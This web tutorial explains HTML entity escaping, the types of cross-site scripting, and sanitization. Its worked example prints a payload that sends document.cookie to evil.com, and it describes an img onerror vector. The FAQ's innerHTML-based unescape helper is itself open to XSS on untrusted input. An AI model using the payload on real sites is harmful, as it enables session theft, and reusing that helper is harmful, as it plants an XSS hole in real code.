正在加载,请稍候…

HTML Entities: Escaping, Unescaping, and XSS Prevention

Learn how HTML entity encoding works, why it's critical for security, and how improper handling leads to XSS vulnerabilities. Includes practical examples and

HTML Entities: Escaping, Unescaping, and XSS Prevention

When you display user-generated content on a web page, you can't trust it. HTML entities are the first line of defense against cross-site scripting (XSS) attacks. This article explains what HTML entities are, how to escape and unescape them correctly, and why that matters for your application's security.

What Are HTML Entities?

HTML entities are sequences of characters that represent reserved or special characters in HTML. For example, < is written as &lt;, > as &gt;, & as &amp;, and " as &quot;. When a browser renders HTML, it displays the entity as the corresponding character, but it never interprets the entity as code. This prevents injected markup from being executed.

Why Escape HTML?

Escaping (or encoding) HTML converts special characters into their entity equivalents. This is essential when inserting untrusted data into HTML contexts such as:

  • Inside element content (e.g., <div>{userInput}</div>)
  • Inside attribute values (e.g., <a href="{userInput}">)
  • Inside <script> or <style> blocks (though different rules apply)

If you skip escaping, an attacker can inject arbitrary HTML or JavaScript. For instance, a comment field containing <script>alert('xss')</script> would execute in every visitor's browser.

The Three Types of XSS

Understanding XSS helps you appreciate why escaping is critical:

  • Stored XSS: Malicious code is saved on the server (e.g., in a database) and served to all users. This is the most dangerous type.
  • Reflected XSS: The payload is in a URL or request parameter and reflected back immediately, often via search results or error messages.
  • DOM-based XSS: The vulnerability exists entirely in client-side JavaScript, where untrusted data modifies the DOM without server involvement.

In all cases, proper HTML entity escaping prevents the browser from treating user input as code.

How to Escape and Unescape HTML

Manual Escaping

You can replace characters manually using a lookup table:

Character Entity
< &lt;
> &gt;
& &amp;
" &quot;
' &#x27;

Using JavaScript's innerText vs innerHTML

Setting element.innerText = userInput automatically escapes HTML. Avoid innerHTML with untrusted data.

Server-Side Libraries

Most frameworks provide built-in escaping: htmlspecialchars() in PHP, escape() in Python's html module, or @ in Razor views.

Dedicated Tools

For quick conversions, use our HTML Entities Escape/Unescape tool. It handles both directions and supports all named entities.

Worked Example: Escaping User Comments

Suppose you have a comment system. A user submits:

Great post! <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>

Without escaping, the rendered HTML becomes:

<p>Great post! <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script></p>

The script executes. With escaping, the output is:

<p>Great post! &lt;script&gt;fetch('https://evil.com/steal?cookie='+document.cookie)&lt;/script&gt;</p>

The browser displays the text safely.

Common Pitfalls

  • Double escaping: If you escape already-escaped data, &amp; becomes &amp;amp;. Unescape only when you trust the source.
  • Wrong context: HTML escaping does NOT protect inside <script> tags or CSS. Use different encoding (e.g., JavaScript string escaping) for those contexts.
  • Attribute escaping: Always quote attributes and escape both " and '. Unquoted attributes are especially dangerous.
  • Assuming library safety: Even popular WYSIWYG editors may need additional XSS filtering. Always sanitize output server-side.
  • Neglecting unicode: Characters like \uFF1C (fullwidth less-than) can bypass naive filters. Use proper encoding libraries.

Security Implications: Beyond Basic Escaping

Escaping alone is not enough for rich content. You need a whitelist-based sanitizer that allows safe HTML tags and attributes while stripping dangerous ones. Libraries like DOMPurify (client-side) or Bleach (Python) do this.

Consider this attack vector: An attacker posts a comment with an <img> tag that has an onerror attribute. Even if < and > are escaped, if you allow some HTML, the onerror handler can execute JavaScript. A sanitizer would remove onerror from the whitelist.

Comparison: Escaping vs Sanitization

Approach Pros Cons
Escaping Simple, fast, prevents all code execution Destroys formatting; no HTML allowed
Sanitization Allows safe HTML; preserves rich content Complex; risk of bypass if whitelist is incomplete
Both Best security Requires careful ordering (escape after sanitization)

FAQ

What's the difference between HTML entities and URL encoding?

HTML entities encode characters for HTML contexts (e.g., <&lt;). URL encoding (percent-encoding) converts characters for URLs (e.g., <%3C). They serve different purposes and are not interchangeable.

Should I escape on the client or server?

Always escape on the server as a final safety net. Client-side escaping can be bypassed by disabling JavaScript. Use server-side escaping for data stored in databases.

Can I use innerText instead of escaping?

Yes, innerText automatically escapes HTML. However, it's only safe for plain text content. For rich HTML, use a sanitizer.

What is &amp; and why does it appear?

&amp; is the entity for &. If you see &amp; in rendered text, it means the & was double-escaped. For example, the original data had &amp;, and after escaping it became &amp;amp;. Unescape once before displaying.

How do I unescape HTML entities in JavaScript?

Create a temporary element and read its textContent:

function unescapeHtml(str) {
  const el = document.createElement('div');
  el.innerHTML = str;
  return el.textContent;
}

This works for most named and numeric entities.